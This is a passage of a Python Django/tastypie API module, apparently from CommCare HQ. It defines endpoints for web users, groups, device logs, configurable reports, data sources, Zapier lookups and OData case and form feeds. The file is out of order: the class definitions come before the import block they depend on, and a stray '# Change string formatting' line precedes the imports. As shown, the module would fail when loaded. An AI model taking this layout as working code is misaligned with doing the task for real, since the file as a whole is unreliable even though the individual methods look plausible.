        assert bundle.obj.domain == kwargs['domain']
        bundle.obj.save()
        user_change_logger.save()
        return bundle

    def obj_delete(self, bundle, **kwargs):
        # "Delete" retires the user (soft delete) and answers 202 Accepted.
        user = CommCareUser.get(kwargs['pk'])
        if user:
            user.retire(bundle.request.domain, deleted_by=bundle.request.couch_user,
                        deleted_via=USER_CHANGE_VIA_API)
        return ImmediateHttpResponse(response=http.HttpAccepted())

    @classmethod
    def _update(cls, bundle, user_change_logger=None):
        """Apply each field in bundle.data via user_updates.update().

        Returns a list of human-readable error messages (empty on success).
        """
        errors = []
        for key, value in bundle.data.items():
            try:
                update(bundle.obj, key, value, user_change_logger)
            except InvalidFieldException as e:
                errors.append(_("Attempted to update unknown or non-editable field '{}'").format(e.field))
            except InvalidFormatException as e:
                errors.append(_('{} must be a {}').format(e.field, e.expected_type))
            except (UpdateConflictException, ValidationError) as e:
                errors.append(e.message)
        return errors
class WebUserResource(v0_1.WebUserResource):

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        """Build the detail URI for a web-user Bundle.

        Only a Bundle can be resolved: the domain comes from the bundle's
        request (a WebUser may belong to several domains, so a bare object
        carries no single domain to build the URL from).
        """
        if not isinstance(bundle_or_obj, Bundle):
            # Bug fix: previously only `None` returned None here; any other
            # non-Bundle argument fell through to reverse() with `domain` and
            # `obj` unbound and raised UnboundLocalError. Report "no URI"
            # instead.
            return None
        domain = bundle_or_obj.request.domain
        obj = bundle_or_obj.obj
        return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
                                                          domain=domain,
                                                          api_name=self._meta.api_name,
                                                          pk=obj._id))
class AdminWebUserResource(v0_1.UserResource):
    """Admin-only, read-only access to web users across all domains."""
    domains = fields.ListField(attribute='domains')

    def obj_get(self, bundle, **kwargs):
        return WebUser.get(kwargs['pk'])

    def obj_get_list(self, bundle, **kwargs):
        # With ?username=... look up that single user; otherwise list all
        # web users known to Elasticsearch.
        if 'username' in bundle.request.GET:
            return [WebUser.get_by_username(bundle.request.GET['username'])]
        return [WebUser.wrap(u) for u in UserES().web_users().run().hits]

    class Meta(WebUserResource.Meta):
        authentication = AdminAuthentication()
        detail_allowed_methods = ['get']
        list_allowed_methods = ['get']
class GroupResource(v0_4.GroupResource):
    """v0.5 group resource adding create/update/delete and bulk PATCH."""

    class Meta(v0_4.GroupResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post', 'patch']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # Surface a stashed error message, or reduce a successful POST
        # response to just the created group's id.
        if not isinstance(data, dict):
            if 'error_message' in data.data:
                data = {'error_message': data.data['error_message']}
            elif request.method == 'POST':
                data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def patch_list(self, request=None, **kwargs):
        """
        Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1466
        (BSD licensed) and modified to pass the kwargs to `obj_create` and support only create method
        """
        request = convert_post_to_patch(request)
        deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
        collection_name = self._meta.collection_name
        if collection_name not in deserialized:
            raise BadRequest("Invalid data sent: missing '%s'" % collection_name)
        if len(deserialized[collection_name]) and 'put' not in self._meta.detail_allowed_methods:
            raise ImmediateHttpResponse(response=http.HttpMethodNotAllowed())
        bundles_seen = []
        status = http.HttpAccepted
        for data in deserialized[collection_name]:
            data = self.alter_deserialized_detail_data(request, data)
            bundle = self.build_bundle(data=dict_strip_unicode_keys(data), request=request)
            try:
                self.obj_create(bundle=bundle, **self.remove_api_resource_names(kwargs))
            except AssertionError as e:
                # Creation failure (e.g. duplicate name): record the message
                # and flip the response status, but keep processing the rest.
                status = http.HttpBadRequest
                bundle.data['_id'] = str(e)
            bundles_seen.append(bundle)
        to_be_serialized = [bundle.data['_id'] for bundle in bundles_seen]
        return self.create_response(request, to_be_serialized, response_class=status)

    def post_list(self, request, **kwargs):
        """
        Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1314
        (BSD licensed) and modified to catch Exception and not returning traceback
        """
        deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
        deserialized = self.alter_deserialized_detail_data(request, deserialized)
        bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized), request=request)
        try:
            updated_bundle = self.obj_create(bundle, **self.remove_api_resource_names(kwargs))
            location = self.get_resource_uri(updated_bundle)
            if not self._meta.always_return_data:
                return http.HttpCreated(location=location)
            else:
                updated_bundle = self.full_dehydrate(updated_bundle)
                updated_bundle = self.alter_detail_data_to_serialize(request, updated_bundle)
                return self.create_response(request, updated_bundle, response_class=http.HttpCreated, location=location)
        except AssertionError as e:
            # Respond 400 with the message instead of a traceback.
            bundle.data['error_message'] = str(e)
            return self.create_response(request, bundle, response_class=http.HttpBadRequest)

    def _update(self, bundle):
        """Copy changed fields from bundle.data onto bundle.obj.

        Returns True when anything changed and the object needs saving.
        """
        should_save = False
        for key, value in bundle.data.items():
            if key == 'name' and getattr(bundle.obj, key, None) != value:
                # Renames must not collide with an existing group name.
                if not Group.by_name(bundle.obj.domain, value):
                    setattr(bundle.obj, key, value or '')
                    should_save = True
                else:
                    raise Exception("A group with this name already exists")
            # NOTE(review): the `elif` below pairs with this `if`, not with
            # the name-check above — verify that is intentional.
            if key == 'users' and getattr(bundle.obj, key, None) != value:
                # Diff the membership lists and apply adds/removes.
                users_to_add = set(value) - set(bundle.obj.users)
                users_to_remove = set(bundle.obj.users) - set(value)
                for user in users_to_add:
                    bundle.obj.add_user(user)
                    should_save = True
                for user in users_to_remove:
                    bundle.obj.remove_user(user)
                    should_save = True
            elif getattr(bundle.obj, key, None) != value:
                setattr(bundle.obj, key, value)
                should_save = True
        return should_save

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        if bundle_or_obj is None:
            return super(GroupResource, self).get_resource_uri(bundle_or_obj, url_name)
        elif isinstance(bundle_or_obj, Bundle):
            obj = bundle_or_obj.obj
        else:
            obj = bundle_or_obj
        return self._get_resource_uri(obj)

    def _get_resource_uri(self, obj):
        # This function is called up to 1000 times per request
        # so build url from a known string template
        # to avoid calling the expensive `reverse` function each time
        return self._get_resource_uri_template.format(domain=obj.domain, pk=obj._id)

    @memoized_property
    def _get_resource_uri_template(self):
        """Returns the literal string "/a/{domain}/api/v0.5/group/{pk}/" in a DRY way"""
        return reverse('api_dispatch_detail', kwargs=dict(
            resource_name=self._meta.resource_name,
            api_name=self._meta.api_name,
            domain='__domain__',
            pk='__pk__')).replace('__pk__', '{pk}').replace('__domain__', '{domain}')

    def obj_create(self, bundle, request=None, **kwargs):
        # Group names must be unique within a domain.
        if not Group.by_name(kwargs['domain'], bundle.data.get("name")):
            bundle.obj = Group(bundle.data)
            bundle.obj.name = bundle.obj.name or ''
            bundle.obj.domain = kwargs['domain']
            bundle.obj.save()
            # Membership is also recorded on each user document.
            for user in bundle.obj.users:
                CommCareUser.get(user).set_groups([bundle.obj._id])
        else:
            raise AssertionError("A group with name %s already exists" % bundle.data.get("name"))
        return bundle

    def obj_update(self, bundle, **kwargs):
        bundle.obj = Group.get(kwargs['pk'])
        assert bundle.obj.domain == kwargs['domain']
        if self._update(bundle):
            assert bundle.obj.domain == kwargs['domain']
            bundle.obj.save()
        return bundle

    def obj_delete(self, bundle, **kwargs):
        # Soft delete so the group can be restored.
        group = self.obj_get(bundle, **kwargs)
        group.soft_delete()
        return bundle
class DomainAuthorization(ReadOnlyAuthorization):
    """Read-only authorization that scopes list queries to the request's domain.

    `domain_key` names the queryset field to filter on (default "domain").
    """

    def __init__(self, domain_key='domain', *args, **kwargs):
        # Bug fix: forward *args/**kwargs to the parent initializer instead of
        # silently discarding them (the original never called super().__init__).
        super().__init__(*args, **kwargs)
        self.domain_key = domain_key

    def read_list(self, object_list, bundle):
        # e.g. queryset.filter(domain=<requesting domain>)
        return object_list.filter(**{self.domain_key: bundle.request.domain})
class DeviceReportResource(HqBaseResource, ModelResource):
    """Read-only feed of DeviceReportEntry log rows, scoped to the
    requesting domain by DomainAuthorization."""

    class Meta(object):
        queryset = DeviceReportEntry.objects.all()
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        resource_name = 'device-log'
        authentication = RequirePermissionAuthentication(Permissions.edit_data)
        authorization = DomainAuthorization()
        # Avoid an expensive COUNT(*) over the (large) log table.
        paginator_class = NoCountingPaginator
        filtering = {
            # this is needed for the domain filtering but any values passed in via the URL get overridden
            "domain": ('exact',),
            "date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
            "user_id": ('exact',),
            "username": ('exact',),
            "type": ('exact',),
            "xform_id": ('exact',),
            "device_id": ('exact',),
        }
# Lightweight container for one page of configurable-report results.
ConfigurableReportData = namedtuple("ConfigurableReportData", [
    "data", "columns", "id", "domain", "total_records", "get_params", "next_page"
])
class ConfigurableReportDataResource(HqBaseResource, DomainSpecificResourceMixin):
    """
    A resource that replicates the behavior of the ajax part of the
    ConfigurableReportView view.
    """
    data = fields.ListField(attribute="data", readonly=True)
    columns = fields.ListField(attribute="columns", readonly=True)
    total_records = fields.IntegerField(attribute="total_records", readonly=True)
    next_page = fields.CharField(attribute="next_page", readonly=True)
    # Page-size default and hard cap for the `limit` GET parameter.
    LIMIT_DEFAULT = 50
    LIMIT_MAX = 50

    def _get_start_param(self, bundle):
        # Parse the `offset` GET parameter; zero (the default) is accepted.
        # NOTE(review): the message says "positive" although the check allows
        # 0 — "non-negative" would be more precise.
        try:
            start = int(bundle.request.GET.get('offset', 0))
            if start < 0:
                raise ValueError
        except (ValueError, TypeError):
            raise BadRequest("start must be a positive integer.")
        return start

    def _get_limit_param(self, bundle):
        # Parse and bound the `limit` GET parameter.
        try:
            limit = int(bundle.request.GET.get('limit', self.LIMIT_DEFAULT))
            if limit < 0:
                raise ValueError
        except (ValueError, TypeError):
            raise BadRequest("limit must be a positive integer.")
        if limit > self.LIMIT_MAX:
            raise BadRequest("Limit may not exceed {}.".format(self.LIMIT_MAX))
        return limit

    def _get_next_page(self, domain, id_, start, limit, total_records, get_query_dict):
        # Build the URL of the following page, or "" on the last page.
        if total_records > start + limit:
            start += limit
            new_get_params = get_query_dict.copy()
            new_get_params["offset"] = start
            # limit has not changed, but it may not have been present in get params before.
            new_get_params["limit"] = limit
            return reverse('api_dispatch_detail', kwargs=dict(
                api_name=self._meta.api_name,
                resource_name=self._meta.resource_name,
                domain=domain,
                pk=id_,
            )) + "?" + new_get_params.urlencode()
        else:
            return ""

    def _get_report_data(self, report_config, domain, start, limit, get_params, couch_user):
        """Run the report and return (page, columns, total_records)."""
        report = ConfigurableReportDataSource.from_spec(report_config, include_prefilters=True)
        # Filters without an explicit datatype are treated as strings.
        string_type_params = [
            filter.name
            for filter in report_config.ui_filters
            if getattr(filter, 'datatype', 'string') == "string"
        ]
        filter_values = get_filter_values(
            report_config.ui_filters,
            query_dict_to_dict(get_params, domain, string_type_params),
            couch_user,
        )
        report.set_filter_values(filter_values)
        page = list(report.get_data(start=start, limit=limit))
        columns = []
        for column in report.columns:
            simple_column = {
                "header": column.header,
                "slug": column.slug,
            }
            # Expanded subcolumns additionally expose the value they expand on.
            if isinstance(column, UCRExpandDatabaseSubcolumn):
                simple_column['expand_column_value'] = column.expand_value
            columns.append(simple_column)
        total_records = report.get_total_records()
        return page, columns, total_records

    def obj_get(self, bundle, **kwargs):
        domain = kwargs['domain']
        pk = kwargs['pk']
        start = self._get_start_param(bundle)
        limit = self._get_limit_param(bundle)
        report_config = self._get_report_configuration(pk, domain)
        page, columns, total_records = self._get_report_data(
            report_config, domain, start, limit, bundle.request.GET, bundle.request.couch_user)
        return ConfigurableReportData(
            data=page,
            columns=columns,
            total_records=total_records,
            id=report_config._id,
            domain=domain,
            get_params=bundle.request.GET,
            next_page=self._get_next_page(
                domain,
                report_config._id,
                start,
                limit,
                total_records,
                bundle.request.GET,
            )
        )

    def _get_report_configuration(self, id_, domain):
        """
        Fetch the required ReportConfiguration object
        :param id_: The id of the ReportConfiguration
        :param domain: The domain of the ReportConfiguration
        :return: A ReportConfiguration
        """
        try:
            # Static (code-defined) and dynamic reports are stored differently.
            if report_config_id_is_static(id_):
                return StaticReportConfiguration.by_id(id_, domain=domain)
            else:
                return get_report_config_or_not_found(domain, id_)
        except DocumentNotFound:
            raise NotFound

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'domain': get_obj(bundle_or_obj).domain,
            'pk': get_obj(bundle_or_obj).id,
        }

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
        # Append paging params so the returned URI round-trips to this page.
        uri = super(ConfigurableReportDataResource, self).get_resource_uri(bundle_or_obj, url_name)
        if bundle_or_obj is not None and uri:
            get_params = get_obj(bundle_or_obj).get_params.copy()
            if "offset" not in get_params:
                get_params["offset"] = 0
            if "limit" not in get_params:
                get_params["limit"] = self.LIMIT_DEFAULT
            uri += "?{}".format(get_params.urlencode())
        return uri

    class Meta(CustomResourceMeta):
        authentication = RequirePermissionAuthentication(Permissions.view_reports, allow_session_auth=True)
        list_allowed_methods = []
        detail_allowed_methods = ["get"]
class SimpleReportConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
    """Read-only metadata (title, filters, columns) for configurable reports."""
    id = fields.CharField(attribute='get_id', readonly=True, unique=True)
    title = fields.CharField(readonly=True, attribute="title", null=True)
    filters = fields.ListField(readonly=True)
    columns = fields.ListField(readonly=True)

    def dehydrate_filters(self, bundle):
        # Reduce each filter spec to the keys this API exposes.
        obj_filters = bundle.obj.filters
        return [{
            "type": f["type"],
            "datatype": f["datatype"],
            "slug": f["slug"]
        } for f in obj_filters]

    def dehydrate_columns(self, bundle):
        # Reduce each column spec to the keys this API exposes.
        obj_columns = bundle.obj.columns
        return [{
            "column_id": c['column_id'],
            "display": c['display'],
            "type": c["type"],
        } for c in obj_columns]

    def obj_get(self, bundle, **kwargs):
        domain = kwargs['domain']
        pk = kwargs['pk']
        try:
            report_configuration = get_document_or_404(ReportConfiguration, domain, pk)
        except Http404 as e:
            # Translate Django's 404 into tastypie's NotFound.
            raise NotFound(str(e))
        return report_configuration

    def obj_get_list(self, bundle, **kwargs):
        domain = kwargs['domain']
        return get_configurable_and_static_reports(domain)

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'domain': get_obj(bundle_or_obj).domain,
            'pk': get_obj(bundle_or_obj)._id,
        }

    class Meta(CustomResourceMeta):
        list_allowed_methods = ["get"]
        detail_allowed_methods = ["get"]
        paginator_class = DoesNothingPaginator
class DataSourceConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
    """
    API resource for DataSourceConfigurations (UCR data sources)
    """
    id = fields.CharField(attribute='get_id', readonly=True, unique=True)
    display_name = fields.CharField(attribute="display_name", null=True)
    # Heavy spec fields are only included in detail responses.
    configured_filter = fields.DictField(attribute="configured_filter", use_in='detail')
    configured_indicators = fields.ListField(attribute="configured_indicators", use_in='detail')

    def _ensure_toggle_enabled(self, request):
        # Gate the whole resource behind the USER_CONFIGURABLE_REPORTS
        # feature toggle, answering 401 (with CORS headers) when it is off.
        if not toggles.USER_CONFIGURABLE_REPORTS.enabled_for_request(request):
            raise ImmediateHttpResponse(
                add_cors_headers_to_response(
                    HttpResponse(
                        json.dumps({"error": _("You don't have permission to access this API")}),
                        content_type="application/json",
                        status=401,
                    )
                )
            )

    def obj_get(self, bundle, **kwargs):
        self._ensure_toggle_enabled(bundle.request)
        domain = kwargs['domain']
        pk = kwargs['pk']
        try:
            data_source = get_document_or_404(DataSourceConfiguration, domain, pk)
        except Http404 as e:
            raise NotFound(str(e))
        return data_source

    def obj_get_list(self, bundle, **kwargs):
        self._ensure_toggle_enabled(bundle.request)
        domain = kwargs['domain']
        return get_datasources_for_domain(domain)

    def obj_update(self, bundle, **kwargs):
        self._ensure_toggle_enabled(bundle.request)
        domain = kwargs['domain']
        pk = kwargs['pk']
        try:
            data_source = get_document_or_404(DataSourceConfiguration, domain, pk)
        except Http404 as e:
            raise NotFound(str(e))
        # Only this whitelisted subset of fields may be written via the API;
        # any other submitted keys are silently ignored.
        allowed_update_fields = [
            'display_name',
            'configured_filter',
            'configured_indicators',
        ]
        for key, value in bundle.data.items():
            if key in allowed_update_fields:
                data_source[key] = value
        try:
            data_source.validate()
            data_source.save()
        except BadSpecError as e:
            # Invalid spec: report the validation details back to the caller.
            raise ImmediateHttpResponse(
                add_cors_headers_to_response(
                    HttpResponse(
                        json.dumps({"error": _("Invalid data source! Details: {details}").format(details=str(e))}),
                        content_type="application/json",
                        status=500,
                    )
                )
            )
        bundle.obj = data_source
        return bundle

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'domain': get_obj(bundle_or_obj).domain,
            'pk': get_obj(bundle_or_obj)._id,
        }

    class Meta(CustomResourceMeta):
        resource_name = 'ucr_data_source'
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get', 'put']
        always_return_data = True
        paginator_class = DoesNothingPaginator
        authentication = RequirePermissionAuthentication(Permissions.edit_ucrs)
# (domain_name, project_name) pair returned by UserDomainsResource; defaults
# make both fields optional.
UserDomain = namedtuple('UserDomain', 'domain_name project_name')
UserDomain.__new__.__defaults__ = ('', '')
class UserDomainsResource(CorsResourceMixin, Resource):
    """Lists the Zapier-enabled domains the requesting user belongs to."""
    domain_name = fields.CharField(attribute='domain_name')
    project_name = fields.CharField(attribute='project_name')

    class Meta(object):
        resource_name = 'user_domains'
        authentication = LoginAuthentication(allow_session_auth=True)
        object_class = UserDomain
        include_resource_uri = False

    def dispatch_list(self, request, **kwargs):
        # Rewrite the framework's 401 with a friendlier plain-text message;
        # all other immediate responses are re-raised untouched.
        try:
            return super(UserDomainsResource, self).dispatch_list(request, **kwargs)
        except ImmediateHttpResponse as immediate_http_response:
            if isinstance(immediate_http_response.response, HttpUnauthorized):
                raise ImmediateHttpResponse(
                    response=HttpUnauthorized(
                        content='Username or API Key is incorrect', content_type='text/plain'
                    )
                )
            else:
                raise

    def obj_get_list(self, bundle, **kwargs):
        # Optional ?feature_flag=<slug> must name a real toggle.
        feature_flag = bundle.request.GET.get("feature_flag")
        if feature_flag and feature_flag not in toggles.all_toggles_slug():
            raise BadRequest("{} is not a valid feature flag".format(feature_flag))
        return self.get_object_list(bundle.request, feature_flag)

    def get_object_list(self, request, feature_flag=None):
        couch_user = CouchUser.from_django_user(request.user)
        results = []
        for domain in couch_user.get_domains():
            # Only Zapier-privileged domains are listed.
            if not domain_has_privilege(domain, privileges.ZAPIER_INTEGRATION):
                continue
            domain_object = Domain.get_by_name(domain)
            # Optionally restrict to domains with the given feature flag on.
            if feature_flag and feature_flag not in toggles.toggles_dict(domain=domain):
                continue
            results.append(UserDomain(
                domain_name=domain_object.name,
                project_name=domain_object.hr_name or domain_object.name
            ))
        return results
class IdentityResource(CorsResourceMixin, Resource):
    """Returns the authenticated user's own profile as a single object."""
    id = fields.CharField(attribute='get_id', readonly=True)
    username = fields.CharField(attribute='username', readonly=True)
    first_name = fields.CharField(attribute='first_name', readonly=True)
    last_name = fields.CharField(attribute='last_name', readonly=True)
    email = fields.CharField(attribute='email', readonly=True)

    def obj_get_list(self, bundle, **kwargs):
        # The "list" is always exactly the requesting user; the serializer
        # below collapses it to a single object in the response.
        return [bundle.request.couch_user]

    class Meta(object):
        resource_name = 'identity'
        authentication = LoginAuthentication()
        serializer = ListToSingleObjectSerializer()
        detail_allowed_methods = []
        list_allowed_methods = ['get']
        object_class = CouchUser
        include_resource_uri = False
# Row object serialized by DomainForms; both fields default to ''.
Form = namedtuple('Form', 'form_xmlns form_name')
Form.__new__.__defaults__ = ('', '')
class DomainForms(Resource):
    """
    Returns: list of forms for a given domain with form name formatted for display in Zapier
    """
    form_xmlns = fields.CharField(attribute='form_xmlns')
    form_name = fields.CharField(attribute='form_name')

    class Meta(object):
        resource_name = 'domain_forms'
        authentication = RequirePermissionAuthentication(Permissions.access_api)
        object_class = Form
        include_resource_uri = False
        allowed_methods = ['get']
        limit = 200
        max_limit = 1000

    def obj_get_list(self, bundle, **kwargs):
        application_id = bundle.request.GET.get('application_id')
        if not application_id:
            raise NotFound('application_id parameter required')

        results = []
        application = Application.get(docid=application_id)
        # NOTE(review): couch-backed `get` typically raises for a missing
        # document rather than returning a falsy value, so this guard may
        # be unreachable -- confirm against Application.get semantics.
        if not application:
            return []
        forms_objects = application.get_forms(bare=False)
        for form_object in forms_objects:
            form = form_object['form']
            module = form_object['module']
            # "App > Module > Form" display name for Zapier dropdowns.
            form_name = '{} > {} > {}'.format(application.name, module.default_name(), form.default_name())
            results.append(Form(form_xmlns=form.xmlns, form_name=form_name))
        return results
# Zapier requires id and name; case_type has no obvious id, placeholder inserted instead.
# `placeholder` is never populated (see DomainCases.obj_get_list), so it
# always serializes as the default ''.
CaseType = namedtuple('CaseType', 'case_type placeholder')
CaseType.__new__.__defaults__ = ('', '')
class DomainCases(Resource):
    """
    Returns: list of case types for a domain

    Note: only returns case types for which at least one case has been made
    """
    placeholder = fields.CharField(attribute='placeholder')
    case_type = fields.CharField(attribute='case_type')

    class Meta(object):
        resource_name = 'domain_cases'
        authentication = RequirePermissionAuthentication(Permissions.access_api)
        object_class = CaseType
        include_resource_uri = False
        allowed_methods = ['get']
        limit = 100
        max_limit = 1000

    def obj_get_list(self, bundle, **kwargs):
        # Case types come from elasticsearch, hence only types with at
        # least one indexed case show up.
        domain = kwargs['domain']
        case_types = get_case_types_for_domain_es(domain)
        results = [CaseType(case_type=case_type) for case_type in case_types]
        return results
# Row object serialized by DomainUsernames; both fields default to ''.
UserInfo = namedtuple('UserInfo', 'user_id user_name')
UserInfo.__new__.__defaults__ = ('', '')
class DomainUsernames(Resource):
    """
    Returns: list of usernames for a domain.
    """
    user_id = fields.CharField(attribute='user_id')
    user_name = fields.CharField(attribute='user_name')

    class Meta(object):
        resource_name = 'domain_usernames'
        authentication = RequirePermissionAuthentication(Permissions.view_commcare_users)
        object_class = User
        include_resource_uri = False
        allowed_methods = ['get']

    def obj_get_list(self, bundle, **kwargs):
        # One UserInfo per (id, username) pair in the domain; usernames
        # are stripped of their @domain suffix for display.
        id_username_pairs = get_all_user_id_username_pairs_by_domain(kwargs['domain'])
        return [
            UserInfo(user_id=user_id, user_name=raw_username(username))
            for user_id, username in id_username_pairs
        ]
class BaseODataResource(HqBaseResource, DomainSpecificResourceMixin):
    """Shared plumbing for the OData case/form feeds.

    Subclasses implement ``obj_get_list``; this base handles privilege
    gating, timing metrics, and OData response headers.
    """
    # Populated per-request in dispatch() from the URL kwargs.
    # NOTE(review): storing request state on the resource instance assumes
    # tastypie uses a fresh instance per request -- confirm before relying
    # on this under concurrency.
    config_id = None
    table_id = None

    def dispatch(self, request_type, request, **kwargs):
        # The whole feed is gated on the ODATA_FEED privilege.
        if not domain_has_privilege(request.domain, privileges.ODATA_FEED):
            raise ImmediateHttpResponse(
                response=HttpResponseNotFound('Feature flag not enabled.')
            )
        self.config_id = kwargs['config_id']
        # table_id is optional in the URL; 0 selects the first table.
        self.table_id = int(kwargs.get('table_id', 0))
        with TimingContext() as timer:
            response = super(BaseODataResource, self).dispatch(
                request_type, request, **kwargs
            )
        # Emit access/latency metrics for monitoring.
        record_feed_access_in_datadog(request, self.config_id, timer.duration, response)
        return response

    def create_response(self, request, data, response_class=HttpResponse,
                        **response_kwargs):
        # Context the OData serializer needs to build metadata URLs.
        data['domain'] = request.domain
        data['config_id'] = self.config_id
        data['api_path'] = request.path
        data['table_id'] = self.table_id
        response = super(BaseODataResource, self).create_response(
            request, data, response_class, **response_kwargs)
        return add_odata_headers(response)

    def detail_uri_kwargs(self, bundle_or_obj):
        # Not sure why this is required but the feed 500s without it
        return {
            'pk': get_obj(bundle_or_obj)['_id']
        }

    def determine_format(self, request):
        # Results should be sent as JSON
        return 'application/json'
@location_safe
class ODataCaseResource(BaseODataResource):
    """OData feed over a domain's case export (CaseExportInstance)."""

    def obj_get_list(self, bundle, domain, **kwargs):
        config = get_document_or_404(CaseExportInstance, domain, self.config_id)
        if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
            raise ImmediateHttpResponse(
                HttpForbidden(gettext_noop(
                    "You do not have permission to view this feed."
                ))
            )
        query = get_case_export_base_query(domain, config.case_type)
        # Renamed from `filter` so the builtin is not shadowed.
        for export_filter in config.get_filters():
            query = query.filter(export_filter.to_es_filter())

        # Location-restricted users only see cases they can access.
        if not bundle.request.couch_user.has_permission(
                domain, 'access_all_locations'):
            query = query_location_restricted_cases(query, bundle.request)

        return query

    class Meta(v0_4.CommCareCaseResource.Meta):
        authentication = ODataAuthentication()
        resource_name = 'odata/cases'
        serializer = ODataCaseSerializer()
        limit = 2000
        max_limit = 10000

    def prepend_urls(self):
        # Two URL forms: with an explicit table_id and without (table 0).
        return [
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
        ]
@location_safe
class ODataFormResource(BaseODataResource):
    """OData feed over a domain's form export (FormExportInstance)."""

    def obj_get_list(self, bundle, domain, **kwargs):
        config = get_document_or_404(FormExportInstance, domain, self.config_id)
        if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
            raise ImmediateHttpResponse(
                HttpForbidden(gettext_noop(
                    "You do not have permission to view this feed."
                ))
            )
        query = get_form_export_base_query(domain, config.app_id, config.xmlns, include_errors=False)
        # Renamed from `filter` so the builtin is not shadowed.
        for export_filter in config.get_filters():
            query = query.filter(export_filter.to_es_filter())

        # Location-restricted users only see forms they can access.
        if not bundle.request.couch_user.has_permission(
                domain, 'access_all_locations'):
            query = query_location_restricted_forms(query, bundle.request)

        return query

    class Meta(v0_4.XFormInstanceResource.Meta):
        authentication = ODataAuthentication()
        resource_name = 'odata/forms'
        serializer = ODataFormSerializer()
        limit = 2000
        max_limit = 10000

    def prepend_urls(self):
        # Two URL forms: with an explicit table_id and without (table 0).
        return [
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
        ]
# Change string formatting
import json
from collections import namedtuple
from django.conf.urls import re_path as url
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.urls import reverse
from django.utils.translation import gettext as _
from django.utils.translation import gettext_noop
from memoized import memoized_property
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import BadRequest, ImmediateHttpResponse, NotFound
from tastypie.http import HttpForbidden, HttpUnauthorized
from tastypie.resources import ModelResource, Resource, convert_post_to_patch
from tastypie.utils import dict_strip_unicode_keys
from phonelog.models import DeviceReportEntry
from corehq import privileges, toggles
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.api.cors import add_cors_headers_to_response
from corehq.apps.api.odata.serializers import (
ODataCaseSerializer,
ODataFormSerializer,
)
from corehq.apps.api.odata.utils import record_feed_access_in_datadog
from corehq.apps.api.odata.views import (
add_odata_headers,
raise_odata_permissions_issues,
)
from corehq.apps.api.resources.auth import (
AdminAuthentication,
LoginAuthentication,
ODataAuthentication,
RequirePermissionAuthentication,
)
from corehq.apps.api.resources.meta import CustomResourceMeta
from corehq.apps.api.resources.serializers import ListToSingleObjectSerializer
from corehq.apps.api.util import get_obj
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import Domain
from corehq.apps.es import UserES
from corehq.apps.export.esaccessors import (
get_case_export_base_query,
get_form_export_base_query,
)
from corehq.apps.export.models import CaseExportInstance, FormExportInstance
from corehq.apps.groups.models import Group
from corehq.apps.locations.permissions import location_safe
from corehq.apps.reports.analytics.esaccessors import (
get_case_types_for_domain_es,
)
from corehq.apps.reports.standard.cases.utils import (
query_location_restricted_cases,
query_location_restricted_forms,
)
from corehq.apps.userreports.columns import UCRExpandDatabaseSubcolumn
from corehq.apps.userreports.dbaccessors import get_datasources_for_domain
from corehq.apps.userreports.exceptions import BadSpecError
from corehq.apps.userreports.models import (
DataSourceConfiguration,
ReportConfiguration,
StaticReportConfiguration,
report_config_id_is_static,
)
from corehq.apps.userreports.reports.data_source import (
ConfigurableReportDataSource,
)
from corehq.apps.userreports.reports.view import (
get_filter_values,
query_dict_to_dict,
)
from corehq.apps.userreports.util import (
get_configurable_and_static_reports,
get_report_config_or_not_found,
)
from corehq.apps.users.dbaccessors import (
get_all_user_id_username_pairs_by_domain,
)
from corehq.apps.users.models import (
CommCareUser,
CouchUser,
Permissions,
UserRole,
WebUser,
)
from corehq.apps.users.util import raw_username
from corehq.const import USER_CHANGE_VIA_API
from corehq.util import get_document_or_404
from corehq.util.couch import DocumentNotFound
from corehq.util.timer import TimingContext
from . import (
CorsResourceMixin,
CouchResourceMixin,
DomainSpecificResourceMixin,
HqBaseResource,
v0_1,
v0_4,
)
from .pagination import DoesNothingPaginator, NoCountingPaginator
from ..exceptions import InvalidFormatException, InvalidFieldException, UpdateConflictException
from ..user_updates import update
# Test hook: when set, replaces user_es_call in BulkUserResource.obj_get_list.
MOCK_BULK_USER_ES = None
def user_es_call(domain, q, fields, size, start_at):
    """Run a UserES query for ``domain`` and return the raw hit dicts.

    :param q: optional query_string query text; None means match-all.
